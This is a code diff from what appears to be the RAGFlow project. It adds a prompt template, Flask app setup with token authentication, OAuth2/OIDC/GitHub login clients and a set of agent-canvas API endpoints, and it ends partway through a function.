    - Select the information from the Searched Web Pages that directly contributes to advancing the **Previous Reasoning Steps**.
    - Ensure that the extracted information is accurate and relevant.
    3. **Output Format:**
    - **If the web pages provide helpful information for current search query:** Present the information beginning with `**Final Information**` as shown below.
    - The language of query **MUST BE** as the same as 'Search Query' or 'Web Pages'.\n"
    **Final Information**
    [Helpful information]
    - **If the web pages do not provide any helpful information for current search query:** Output the following text.
    **Final Information**
    No helpful information found.
    **Inputs:**
    - **Previous Reasoning Steps:**  
    {prev_reasoning}
    - **Current Search Query:**  
    {search_query}
    - **Searched Web Pages:**  
    {document}
    """
--- a/api/init.py
+++ b/api/init.py
@ -0,0 +1,18 @@
 #
 #  Copyright 2025 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 from beartype.claw import beartype_this_package
 beartype_this_package()
--- a/api/apps/init.py
+++ b/api/apps/init.py
@ -1,120 +1,178 @@
-#
+#
-#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
+#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
-#
+#
-#  Licensed under the Apache License, Version 2.0 (the "License");
+#  Licensed under the Apache License, Version 2.0 (the "License");
-#  you may not use this file except in compliance with the License.
+#  you may not use this file except in compliance with the License.
-#  You may obtain a copy of the License at
+#  You may obtain a copy of the License at
-#
+#
-#      http://www.apache.org/licenses/LICENSE-2.0
+#      http://www.apache.org/licenses/LICENSE-2.0
-#
+#
-#  Unless required by applicable law or agreed to in writing, software
+#  Unless required by applicable law or agreed to in writing, software
-#  distributed under the License is distributed on an "AS IS" BASIS,
+#  distributed under the License is distributed on an "AS IS" BASIS,
-#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#  See the License for the specific language governing permissions and
+#  See the License for the specific language governing permissions and
-#  limitations under the License.
+#  limitations under the License.
-#
+#
-import logging
+import os
-import os
+import sys
-import sys
+import logging
-from importlib.util import module_from_spec, spec_from_file_location
+from importlib.util import module_from_spec, spec_from_file_location
-from pathlib import Path
+from pathlib import Path
-from flask import Blueprint, Flask
+from flask import Blueprint, Flask
-from werkzeug.wrappers.request import Request
+from werkzeug.wrappers.request import Request
-from flask_cors import CORS
+from flask_cors import CORS
-
+from flasgger import Swagger
-from api.db import StatusEnum
+from itsdangerous.url_safe import URLSafeTimedSerializer as Serializer
-from api.db.db_models import close_connection
+
-from api.db.services import UserService
+from api.db import StatusEnum
-from api.utils import CustomJSONEncoder
+from api.db.db_models import close_connection
-
+from api.db.services import UserService
-from flask_session import Session
+from api.utils import CustomJSONEncoder, commands
-from flask_login import LoginManager
+
-from api.settings import SECRET_KEY, stat_logger
+from flask_session import Session
-from api.settings import API_VERSION, access_logger
+from flask_login import LoginManager
-from api.utils.api_utils import server_error_response
+from api import settings
-from itsdangerous.url_safe import URLSafeTimedSerializer as Serializer
+from api.utils.api_utils import server_error_response
-
+from api.constants import API_VERSION
-__all__ = ['app']
+
-
+__all__ = ["app"]
-
+
-logger = logging.getLogger('flask.app')
+Request.json = property(lambda self: self.get_json(force=True, silent=True))
-for h in access_logger.handlers:
+
-    logger.addHandler(h)
+app = Flask(__name__)
-
+
-Request.json = property(lambda self: self.get_json(force=True, silent=True))
+# Add this at the beginning of your file to configure Swagger UI
-
+swagger_config = {
-app = Flask(__name__)
+    "headers": [],
-CORS(app, supports_credentials=True,max_age=2592000)
+    "specs": [
-app.url_map.strict_slashes = False
+        {
-app.json_encoder = CustomJSONEncoder
+            "endpoint": "apispec",
-app.errorhandler(Exception)(server_error_response)
+            "route": "/apispec.json",
-
+            "rule_filter": lambda rule: True,  # Include all endpoints
-
+            "model_filter": lambda tag: True,  # Include all models
-## convince for dev and debug
+        }
-#app.config["LOGIN_DISABLED"] = True
+    ],
-app.config["SESSION_PERMANENT"] = False
+    "static_url_path": "/flasgger_static",
-app.config["SESSION_TYPE"] = "filesystem"
+    "swagger_ui": True,
-app.config['MAX_CONTENT_LENGTH'] = int(os.environ.get("MAX_CONTENT_LENGTH", 128 * 1024 * 1024))
+    "specs_route": "/apidocs/",
-
+}
-Session(app)
+
-login_manager = LoginManager()
+swagger = Swagger(
-login_manager.init_app(app)
+    app,
-
+    config=swagger_config,
-
+    template={
-
+        "swagger": "2.0",
-def search_pages_path(pages_dir):
+        "info": {
-    return [path for path in pages_dir.glob('*_app.py') if not path.name.startswith('.')]
+            "title": "RAGFlow API",
-
+            "description": "",
-
+            "version": "1.0.0",
-def register_page(page_path):
+        },
-    page_name = page_path.stem.rstrip('_app')
+        "securityDefinitions": {
-    module_name = '.'.join(page_path.parts[page_path.parts.index('api'):-1] + (page_name, ))
+            "ApiKeyAuth": {"type": "apiKey", "name": "Authorization", "in": "header"}
-
+        },
-    spec = spec_from_file_location(module_name, page_path)
+    },
-    page = module_from_spec(spec)
+)
-    page.app = app
+
-    page.manager = Blueprint(page_name, module_name)
+CORS(app, supports_credentials=True, max_age=2592000)
-    sys.modules[module_name] = page
+app.url_map.strict_slashes = False
-    spec.loader.exec_module(page)
+app.json_encoder = CustomJSONEncoder
-
+app.errorhandler(Exception)(server_error_response)
-    page_name = getattr(page, 'page_name', page_name)
+
-    url_prefix = f'/{API_VERSION}/{page_name}'
+## convince for dev and debug
-
+# app.config["LOGIN_DISABLED"] = True
-    app.register_blueprint(page.manager, url_prefix=url_prefix)
+app.config["SESSION_PERMANENT"] = False
-    return url_prefix
+app.config["SESSION_TYPE"] = "filesystem"
-
+app.config["MAX_CONTENT_LENGTH"] = int(
-
+    os.environ.get("MAX_CONTENT_LENGTH", 1024 * 1024 * 1024)
-pages_dir = [
+)
-    Path(__file__).parent,
+
-    Path(__file__).parent.parent / 'api' / 'apps',
+Session(app)
-]
+login_manager = LoginManager()
-
+login_manager.init_app(app)
-client_urls_prefix = [
+
-    register_page(path)
+commands.register_commands(app)
-    for dir in pages_dir
+
-    for path in search_pages_path(dir)
+
-]
+def search_pages_path(pages_dir):
-
+    app_path_list = [
-
+        path for path in pages_dir.glob("*_app.py") if not path.name.startswith(".")
-@login_manager.request_loader
+    ]
-def load_user(web_request):
+    api_path_list = [
-    jwt = Serializer(secret_key=SECRET_KEY)
+        path for path in pages_dir.glob("*sdk/*.py") if not path.name.startswith(".")
-    authorization = web_request.headers.get("Authorization")
+    ]
-    if authorization:
+    app_path_list.extend(api_path_list)
-        try:
+    return app_path_list
-            access_token = str(jwt.loads(authorization))
+
-            user = UserService.query(access_token=access_token, status=StatusEnum.VALID.value)
+
-            if user:
+def register_page(page_path):
-                return user[0]
+    path = f"{page_path}"
-            else:
+
-                return None
+    page_name = page_path.stem.removesuffix("_app")
-        except Exception as e:
+    module_name = ".".join(
-            stat_logger.exception(e)
+        page_path.parts[page_path.parts.index("api"): -1] + (page_name,)
-            return None
+    )
-    else:
+
-        return None
+    spec = spec_from_file_location(module_name, page_path)
-
+    page = module_from_spec(spec)
-
+    page.app = app
-@app.teardown_request
+    page.manager = Blueprint(page_name, module_name)
-def _db_close(exc):
+    sys.modules[module_name] = page
-    close_connection()
+    spec.loader.exec_module(page)
    page_name = getattr(page, "page_name", page_name)
    sdk_path = "\\sdk\\" if sys.platform.startswith("win") else "/sdk/"
    url_prefix = (
        f"/api/{API_VERSION}" if sdk_path in path else f"/{API_VERSION}/{page_name}"
    )
    app.register_blueprint(page.manager, url_prefix=url_prefix)
    return url_prefix
 pages_dir = [
    Path(__file__).parent,
    Path(__file__).parent.parent / "api" / "apps",
    Path(__file__).parent.parent / "api" / "apps" / "sdk",
 ]
 client_urls_prefix = [
    register_page(path) for dir in pages_dir for path in search_pages_path(dir)
 ]
@login_manager.request_loader
 def load_user(web_request):
    jwt = Serializer(secret_key=settings.SECRET_KEY)
    authorization = web_request.headers.get("Authorization")
    if authorization:
        try:
            access_token = str(jwt.loads(authorization))
            if not access_token or not access_token.strip():
                logging.warning("Authentication attempt with empty access token")
                return None
            # Access tokens should be UUIDs (32 hex characters)
            if len(access_token.strip()) < 32:
                logging.warning(f"Authentication attempt with invalid token format: {len(access_token)} chars")
                return None
            user = UserService.query(
                access_token=access_token, status=StatusEnum.VALID.value
            )
            if user:
                if not user[0].access_token or not user[0].access_token.strip():
                    logging.warning(f"User {user[0].email} has empty access_token in database")
                    return None
                return user[0]
            else:
                return None
        except Exception as e:
            logging.warning(f"load_user got exception {e}")
            return None
    else:
        return None
@app.teardown_request
 def _db_close(exc):
    close_connection()
--- a/api/apps/api_app.py
+++ b/api/apps/api_app.py
--- a/api/apps/auth/README.md
+++ b/api/apps/auth/README.md
@ -0,0 +1,76 @@
 # Auth
 The Auth module provides implementations of OAuth2 and OpenID Connect (OIDC) authentication for integration with third-party identity providers. 
 **Features**
 - Supports both OAuth2 and OIDC authentication protocols
 - Automatic OIDC configuration discovery (via `/.well-known/openid-configuration`)
 - JWT token validation
 - Unified user information handling
 ## Usage
 ```python
 # OAuth2 configuration
 oauth_config = {
    "type": "oauth2",
    "client_id": "your_client_id",
    "client_secret": "your_client_secret",
    "authorization_url": "https://your-oauth-provider.com/oauth/authorize",
    "token_url": "https://your-oauth-provider.com/oauth/token",
    "userinfo_url": "https://your-oauth-provider.com/oauth/userinfo",
    "redirect_uri": "https://your-app.com/v1/user/oauth/callback/<channel>"
 }
 # OIDC configuration
 oidc_config = {
    "type": "oidc",
    "issuer": "https://your-oauth-provider.com/oidc",
    "client_id": "your_client_id",
    "client_secret": "your_client_secret",
    "redirect_uri": "https://your-app.com/v1/user/oauth/callback/<channel>"
 }
 # Github OAuth configuration
 github_config = {
    "type": "github"
    "client_id": "your_client_id",
    "client_secret": "your_client_secret",
    "redirect_uri": "https://your-app.com/v1/user/oauth/callback/<channel>"
 }
 # Get client instance
 client = get_auth_client(oauth_config)
 ```
 ### Authentication Flow
 1. Get authorization URL:
 ```python
 auth_url = client.get_authorization_url()
 ```
 2. After user authorization, exchange authorization code for token:
 ```python
 token_response = client.exchange_code_for_token(authorization_code)
 access_token = token_response["access_token"]
 ```
 3. Fetch user information:
 ```python
 user_info = client.fetch_user_info(access_token)
 ```
 ## User Information Structure
 All authentication methods return user information following this structure:
 ```python
 {
    "email": "user@example.com",
    "username": "username",
    "nickname": "User Name",
    "avatar_url": "https://example.com/avatar.jpg"
 }
 ```
--- a/api/apps/auth/init.py
+++ b/api/apps/auth/init.py
@ -0,0 +1,40 @@
 #
 #  Copyright 2025 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 from .oauth import OAuthClient
 from .oidc import OIDCClient
 from .github import GithubOAuthClient
 CLIENT_TYPES = {
    "oauth2": OAuthClient,
    "oidc": OIDCClient,
    "github": GithubOAuthClient
 }
 def get_auth_client(config)->OAuthClient:
    channel_type = str(config.get("type", "")).lower()
    if channel_type == "":
        if config.get("issuer"):
            channel_type = "oidc"
        else:
            channel_type = "oauth2"
    client_class = CLIENT_TYPES.get(channel_type)
    if not client_class:
        raise ValueError(f"Unsupported type: {channel_type}")
    return client_class(config)
--- a/api/apps/auth/github.py
+++ b/api/apps/auth/github.py
@ -0,0 +1,63 @@
 #
 #  Copyright 2025 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 import requests
 from .oauth import OAuthClient, UserInfo
 class GithubOAuthClient(OAuthClient):
    def __init__(self, config):
        """
        Initialize the GithubOAuthClient with the provider's configuration.
        """
        config.update({
            "authorization_url": "https://github.com/login/oauth/authorize",
            "token_url": "https://github.com/login/oauth/access_token",
            "userinfo_url": "https://api.github.com/user",
            "scope": "user:email"
        })
        super().__init__(config)
    def fetch_user_info(self, access_token, **kwargs):
        """
        Fetch github user info.
        """
        user_info = {}
        try:
            headers = {"Authorization": f"Bearer {access_token}"}
            # user info
            response = requests.get(self.userinfo_url, headers=headers, timeout=self.http_request_timeout)
            response.raise_for_status()
            user_info.update(response.json())
            # email info
            response = requests.get(self.userinfo_url+"/emails", headers=headers, timeout=self.http_request_timeout)
            response.raise_for_status()
            email_info = response.json()
            user_info["email"] = next(
                (email for email in email_info if email["primary"]), None
            )["email"]
            return self.normalize_user_info(user_info)
        except requests.exceptions.RequestException as e:
            raise ValueError(f"Failed to fetch github user info: {e}")
    def normalize_user_info(self, user_info):
        email = user_info.get("email")
        username = user_info.get("login", str(email).split("@")[0])
        nickname = user_info.get("name", username)
        avatar_url = user_info.get("avatar_url", "")
        return UserInfo(email=email, username=username, nickname=nickname, avatar_url=avatar_url)
--- a/api/apps/auth/oauth.py
+++ b/api/apps/auth/oauth.py
@ -0,0 +1,110 @@
 #
 #  Copyright 2025 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 import requests
 import urllib.parse
 class UserInfo:
    def __init__(self, email, username, nickname, avatar_url):
        self.email = email
        self.username = username
        self.nickname = nickname
        self.avatar_url = avatar_url
    def to_dict(self):
        return {key: value for key, value in self.__dict__.items()}
 class OAuthClient:
    def __init__(self, config):
        """
        Initialize the OAuthClient with the provider's configuration.
        """
        self.client_id = config["client_id"]
        self.client_secret = config["client_secret"]
        self.authorization_url = config["authorization_url"]
        self.token_url = config["token_url"]
        self.userinfo_url = config["userinfo_url"]
        self.redirect_uri = config["redirect_uri"]
        self.scope = config.get("scope", None)
        self.http_request_timeout = 7
    def get_authorization_url(self, state=None):
        """
        Generate the authorization URL for user login.
        """
        params = {
            "client_id": self.client_id,
            "redirect_uri": self.redirect_uri,
            "response_type": "code",
        }
        if self.scope:
            params["scope"] = self.scope
        if state:
            params["state"] = state
        authorization_url = f"{self.authorization_url}?{urllib.parse.urlencode(params)}"
        return authorization_url
    def exchange_code_for_token(self, code):
        """
        Exchange authorization code for access token.
        """
        try:
            payload = {
                "client_id": self.client_id,
                "client_secret": self.client_secret,
                "code": code,
                "redirect_uri": self.redirect_uri,
                "grant_type": "authorization_code"
            }
            response = requests.post(
                self.token_url,
                data=payload,
                headers={"Accept": "application/json"},
                timeout=self.http_request_timeout
            )
            response.raise_for_status()
            return response.json()
        except requests.exceptions.RequestException as e:
            raise ValueError(f"Failed to exchange authorization code for token: {e}")
    def fetch_user_info(self, access_token, **kwargs):
        """
        Fetch user information using access token.
        """
        try:
            headers = {"Authorization": f"Bearer {access_token}"}
            response = requests.get(self.userinfo_url, headers=headers, timeout=self.http_request_timeout)
            response.raise_for_status()
            user_info = response.json()
            return self.normalize_user_info(user_info)
        except requests.exceptions.RequestException as e:
            raise ValueError(f"Failed to fetch user info: {e}")
    def normalize_user_info(self, user_info):
        email = user_info.get("email")
        username = user_info.get("username", str(email).split("@")[0])
        nickname = user_info.get("nickname", username)
        avatar_url = user_info.get("avatar_url", None)
        if avatar_url is None:
            avatar_url = user_info.get("picture", "")
        return UserInfo(email=email, username=username, nickname=nickname, avatar_url=avatar_url)
--- a/api/apps/auth/oidc.py
+++ b/api/apps/auth/oidc.py
@ -0,0 +1,99 @@
 #
 #  Copyright 2025 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 import jwt
 import requests
 from .oauth import OAuthClient
 class OIDCClient(OAuthClient):
    def __init__(self, config):
        """
        Initialize the OIDCClient with the provider's configuration.
        Use `issuer` as the single source of truth for configuration discovery.
        """
        self.issuer = config.get("issuer")
        if not self.issuer:
            raise ValueError("Missing issuer in configuration.")
        oidc_metadata = self._load_oidc_metadata(self.issuer)
        config.update({
            'issuer': oidc_metadata['issuer'],
            'jwks_uri': oidc_metadata['jwks_uri'], 
            'authorization_url': oidc_metadata['authorization_endpoint'],
            'token_url': oidc_metadata['token_endpoint'],
            'userinfo_url': oidc_metadata['userinfo_endpoint']
        })
        super().__init__(config)
        self.issuer = config['issuer']
        self.jwks_uri = config['jwks_uri']
    def _load_oidc_metadata(self, issuer):
        """
        Load OIDC metadata from `/.well-known/openid-configuration`.
        """
        try:
            metadata_url = f"{issuer}/.well-known/openid-configuration"
            response = requests.get(metadata_url, timeout=7)
            response.raise_for_status()
            return response.json()
        except requests.exceptions.RequestException as e:
            raise ValueError(f"Failed to fetch OIDC metadata: {e}")
    def parse_id_token(self, id_token):
        """
        Parse and validate OIDC ID Token (JWT format) with signature verification.
        """
        try:
            # Decode JWT header without verifying signature
            headers = jwt.get_unverified_header(id_token)
            # OIDC usually uses `RS256` for signing
            alg = headers.get("alg", "RS256")
            # Use PyJWT's PyJWKClient to fetch JWKS and find signing key
            jwks_cli = jwt.PyJWKClient(self.jwks_uri)
            signing_key = jwks_cli.get_signing_key_from_jwt(id_token).key
            # Decode and verify signature
            decoded_token = jwt.decode(
                id_token,
                key=signing_key,
                algorithms=[alg],  
                audience=str(self.client_id),
                issuer=self.issuer,
            )
            return decoded_token
        except Exception as e:
            raise ValueError(f"Error parsing ID Token: {e}")
    def fetch_user_info(self, access_token, id_token=None, **kwargs):
        """
        Fetch user info.
        """
        user_info = {}
        if id_token:
            user_info = self.parse_id_token(id_token)
        user_info.update(super().fetch_user_info(access_token).to_dict())
        return self.normalize_user_info(user_info)
    def normalize_user_info(self, user_info):
        return super().normalize_user_info(user_info)
--- a/api/apps/canvas_app.py
+++ b/api/apps/canvas_app.py
@ -0,0 +1,466 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 import json
 import logging
 import re
 import sys
 from functools import partial
 import trio
 from flask import request, Response
 from flask_login import login_required, current_user
 from agent.component import LLM
 from api.db import FileType
 from api.db.services.canvas_service import CanvasTemplateService, UserCanvasService, API4ConversationService
 from api.db.services.document_service import DocumentService
 from api.db.services.file_service import FileService
 from api.db.services.user_service import TenantService
 from api.db.services.user_canvas_version import UserCanvasVersionService
 from api.settings import RetCode
 from api.utils import get_uuid
 from api.utils.api_utils import get_json_result, server_error_response, validate_request, get_data_error_result, \
    get_error_data_result
 from agent.canvas import Canvas
 from peewee import MySQLDatabase, PostgresqlDatabase
 from api.db.db_models import APIToken
 import time
 from api.utils.file_utils import filename_type, read_potential_broken_pdf
 from rag.utils.redis_conn import REDIS_CONN
@manager.route('/templates', methods=['GET'])  # noqa: F821
@login_required
 def templates():
    return get_json_result(data=[c.to_dict() for c in CanvasTemplateService.get_all()])
@manager.route('/list', methods=['GET'])  # noqa: F821
@login_required
 def canvas_list():
    return get_json_result(data=sorted([c.to_dict() for c in \
                                 UserCanvasService.query(user_id=current_user.id)], key=lambda x: x["update_time"]*-1)
                           )
@manager.route('/rm', methods=['POST'])  # noqa: F821
@validate_request("canvas_ids")
@login_required
 def rm():
    for i in request.json["canvas_ids"]:
        if not UserCanvasService.query(user_id=current_user.id,id=i):
            return get_json_result(
                data=False, message='Only owner of canvas authorized for this operation.',
                code=RetCode.OPERATING_ERROR)
        UserCanvasService.delete_by_id(i)
    return get_json_result(data=True)
@manager.route('/set', methods=['POST'])  # noqa: F821
@validate_request("dsl", "title")
@login_required
 def save():
    req = request.json
    req["user_id"] = current_user.id
    if not isinstance(req["dsl"], str):
        req["dsl"] = json.dumps(req["dsl"], ensure_ascii=False)
    req["dsl"] = json.loads(req["dsl"])
    if "id" not in req:
        if UserCanvasService.query(user_id=current_user.id, title=req["title"].strip()):
            return get_data_error_result(message=f"{req['title'].strip()} already exists.")
        req["id"] = get_uuid()
        if not UserCanvasService.save(**req):
            return get_data_error_result(message="Fail to save canvas.")
    else:
        if not UserCanvasService.query(user_id=current_user.id, id=req["id"]):
            return get_json_result(
                data=False, message='Only owner of canvas authorized for this operation.',
                code=RetCode.OPERATING_ERROR)
        UserCanvasService.update_by_id(req["id"], req)
    # save version    
    UserCanvasVersionService.insert( user_canvas_id=req["id"], dsl=req["dsl"], title="{0}_{1}".format(req["title"], time.strftime("%Y_%m_%d_%H_%M_%S")))
    UserCanvasVersionService.delete_all_versions(req["id"])
    return get_json_result(data=req)
@manager.route('/get/<canvas_id>', methods=['GET'])  # noqa: F821
@login_required
 def get(canvas_id):
    e, c = UserCanvasService.get_by_tenant_id(canvas_id)
    if not e or c["user_id"] != current_user.id:
        return get_data_error_result(message="canvas not found.")
    return get_json_result(data=c)
@manager.route('/getsse/<canvas_id>', methods=['GET'])  # type: ignore # noqa: F821
 def getsse(canvas_id):
    token = request.headers.get('Authorization').split()
    if len(token) != 2:
        return get_data_error_result(message='Authorization is not valid!"')
    token = token[1]
    objs = APIToken.query(beta=token)
    if not objs:
        return get_data_error_result(message='Authentication error: API key is invalid!"')
    tenant_id = objs[0].tenant_id
    e, c = UserCanvasService.get_by_id(canvas_id)
    if not e or c.user_id != tenant_id:
        return get_data_error_result(message="canvas not found.")
    return get_json_result(data=c.to_dict())
@manager.route('/completion', methods=['POST'])  # noqa: F821
@validate_request("id")
@login_required
 def run():
    req = request.json
    query = req.get("query", "")
    files = req.get("files", [])
    inputs = req.get("inputs", {})
    user_id = req.get("user_id", current_user.id)
    e, cvs = UserCanvasService.get_by_id(req["id"])
    if not e:
        return get_data_error_result(message="canvas not found.")
    if not UserCanvasService.query(user_id=current_user.id, id=req["id"]):
        return get_json_result(
            data=False, message='Only owner of canvas authorized for this operation.',
            code=RetCode.OPERATING_ERROR)
    if not isinstance(cvs.dsl, str):
        cvs.dsl = json.dumps(cvs.dsl, ensure_ascii=False)
    try:
        canvas = Canvas(cvs.dsl, current_user.id, req["id"])
    except Exception as e:
        return server_error_response(e)
    def sse():
        nonlocal canvas, user_id
        try:
            for ans in canvas.run(query=query, files=files, user_id=user_id, inputs=inputs):
                yield "data:" + json.dumps(ans, ensure_ascii=False) + "\n\n"
            cvs.dsl = json.loads(str(canvas))
            UserCanvasService.update_by_id(req["id"], cvs.to_dict())
        except Exception as e:
            logging.exception(e)
            yield "data:" + json.dumps({"code": 500, "message": str(e), "data": False}, ensure_ascii=False) + "\n\n"
    resp = Response(sse(), mimetype="text/event-stream")
    resp.headers.add_header("Cache-control", "no-cache")
    resp.headers.add_header("Connection", "keep-alive")
    resp.headers.add_header("X-Accel-Buffering", "no")
    resp.headers.add_header("Content-Type", "text/event-stream; charset=utf-8")
    return resp
@manager.route('/reset', methods=['POST'])  # noqa: F821
@validate_request("id")
@login_required
 def reset():
    req = request.json
    try:
        e, user_canvas = UserCanvasService.get_by_id(req["id"])
        if not e:
            return get_data_error_result(message="canvas not found.")
        if not UserCanvasService.query(user_id=current_user.id, id=req["id"]):
            return get_json_result(
                data=False, message='Only owner of canvas authorized for this operation.',
                code=RetCode.OPERATING_ERROR)
        canvas = Canvas(json.dumps(user_canvas.dsl), current_user.id)
        canvas.reset()
        req["dsl"] = json.loads(str(canvas))
        UserCanvasService.update_by_id(req["id"], {"dsl": req["dsl"]})
        return get_json_result(data=req["dsl"])
    except Exception as e:
        return server_error_response(e)
@manager.route("/upload/<canvas_id>", methods=["POST"])  # noqa: F821
 def upload(canvas_id):
    e, cvs = UserCanvasService.get_by_tenant_id(canvas_id)
    if not e:
        return get_data_error_result(message="canvas not found.")
    user_id = cvs["user_id"]
    def structured(filename, filetype, blob, content_type):
        nonlocal user_id
        if filetype == FileType.PDF.value:
            blob = read_potential_broken_pdf(blob)
        location = get_uuid()
        FileService.put_blob(user_id, location, blob)
        return {
            "id": location,
            "name": filename,
            "size": sys.getsizeof(blob),
            "extension": filename.split(".")[-1].lower(),
            "mime_type": content_type,
            "created_by": user_id,
            "created_at": time.time(),
            "preview_url": None
        }
    if request.args.get("url"):
        from crawl4ai import (
            AsyncWebCrawler,
            BrowserConfig,
            CrawlerRunConfig,
            DefaultMarkdownGenerator,
            PruningContentFilter,
            CrawlResult
        )
        try:
            url = request.args.get("url")
            filename = re.sub(r"\?.*", "", url.split("/")[-1])
            async def adownload():
                browser_config = BrowserConfig(
                    headless=True,
                    verbose=False,
                )
                async with AsyncWebCrawler(config=browser_config) as crawler:
                    crawler_config = CrawlerRunConfig(
                        markdown_generator=DefaultMarkdownGenerator(
                            content_filter=PruningContentFilter()
                        ),
                        pdf=True,
                        screenshot=False
                    )
                    result: CrawlResult = await crawler.arun(
                        url=url,
                        config=crawler_config
                    )
                    return result
            page = trio.run(adownload())
            if page.pdf:
                if filename.split(".")[-1].lower() != "pdf":
                    filename += ".pdf"
                return get_json_result(data=structured(filename, "pdf", page.pdf, page.response_headers["content-type"]))
            return get_json_result(data=structured(filename, "html", str(page.markdown).encode("utf-8"), page.response_headers["content-type"], user_id))
        except Exception as e:
            return  server_error_response(e)
    file = request.files['file']
    try:
        DocumentService.check_doc_health(user_id, file.filename)
        return get_json_result(data=structured(file.filename, filename_type(file.filename), file.read(), file.content_type))
    except Exception as e:
        return  server_error_response(e)
@manager.route('/input_form', methods=['GET'])  # noqa: F821
@login_required
 def input_form():
    cvs_id = request.args.get("id")
    cpn_id = request.args.get("component_id")
    try:
        e, user_canvas = UserCanvasService.get_by_id(cvs_id)
        if not e:
            return get_data_error_result(message="canvas not found.")
        if not UserCanvasService.query(user_id=current_user.id, id=cvs_id):
            return get_json_result(
                data=False, message='Only owner of canvas authorized for this operation.',
                code=RetCode.OPERATING_ERROR)
        canvas = Canvas(json.dumps(user_canvas.dsl), current_user.id)
        return get_json_result(data=canvas.get_component_input_form(cpn_id))
    except Exception as e:
        return server_error_response(e)
@manager.route('/debug', methods=['POST'])  # noqa: F821
@validate_request("id", "component_id", "params")
@login_required
 def debug():
    req = request.json
    try:
        e, user_canvas = UserCanvasService.get_by_id(req["id"])
        if not e:
            return get_data_error_result(message="canvas not found.")
        if not UserCanvasService.query(user_id=current_user.id, id=req["id"]):
            return get_json_result(
                data=False, message='Only owner of canvas authorized for this operation.',
                code=RetCode.OPERATING_ERROR)
        canvas = Canvas(json.dumps(user_canvas.dsl), current_user.id)
        canvas.reset()
        canvas.message_id = get_uuid()
        component = canvas.get_component(req["component_id"])["obj"]
        component.reset()
        if isinstance(component, LLM):
            component.set_debug_inputs(req["params"])
        component.invoke(**{k: o["value"] for k,o in req["params"].items()})
        outputs = component.output()
        for k in outputs.keys():
            if isinstance(outputs[k], partial):
                txt = ""
                for c in outputs[k]():
                    txt += c
                outputs[k] = txt
        return get_json_result(data=outputs)
    except Exception as e:
        return server_error_response(e)
@manager.route('/test_db_connect', methods=['POST'])  # noqa: F821
@validate_request("db_type", "database", "username", "host", "port", "password")
@login_required
 def test_db_connect():
    req = request.json
    try:
        if req["db_type"] in ["mysql", "mariadb"]:
            db = MySQLDatabase(req["database"], user=req["username"], host=req["host"], port=req["port"],
                               password=req["password"])
        elif req["db_type"] == 'postgresql':
            db = PostgresqlDatabase(req["database"], user=req["username"], host=req["host"], port=req["port"],
                                    password=req["password"])
        elif req["db_type"] == 'mssql':
            import pyodbc
            connection_string = (
                f"DRIVER={{ODBC Driver 17 for SQL Server}};"
                f"SERVER={req['host']},{req['port']};"
                f"DATABASE={req['database']};"
                f"UID={req['username']};"
                f"PWD={req['password']};"
            )
            db = pyodbc.connect(connection_string)
            cursor = db.cursor()
            cursor.execute("SELECT 1")
            cursor.close()
        else:
            return server_error_response("Unsupported database type.")
        if req["db_type"] != 'mssql':
            db.connect()
        db.close()
        return get_json_result(data="Database Connection Successful!")
    except Exception as e:
        return server_error_response(e)
 #api get list version dsl of canvas
@manager.route('/getlistversion/<canvas_id>', methods=['GET'])  # noqa: F821
@login_required
 def getlistversion(canvas_id):
    try:
        list =sorted([c.to_dict() for c in UserCanvasVersionService.list_by_canvas_id(canvas_id)], key=lambda x: x["update_time"]*-1)
        return get_json_result(data=list)
    except Exception as e:
